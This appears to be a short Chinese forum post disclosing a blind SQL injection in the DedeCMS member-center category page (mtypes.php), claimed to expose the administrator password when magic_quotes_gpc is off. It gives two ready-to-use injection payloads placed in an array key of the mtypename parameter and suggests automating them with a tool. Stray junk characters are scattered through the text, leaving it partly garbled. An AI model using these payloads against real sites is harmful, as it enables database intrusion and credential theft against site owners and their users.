DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

admin

需要magic_quotes_gpc = Off,所以说是鸡肋啊.
2 G4 F6 y9 m2 k$ F7 a" h2 C

# Q6 e4 x- e4 y. e% m: M5 S+ d发生在数组key里的注射漏洞,有点意思.
! H- o, ?* Y5 m
( C  X6 e/ }' d这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
: k4 Y/ W( _  Y. t5 ]
http://www.xxx.com /dede/member/mtypes.php?dopost=save

exploit:
5 K4 _1 h; ^" `  t% c/ }mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
- q- R) {2 Q- Y; `3 [  C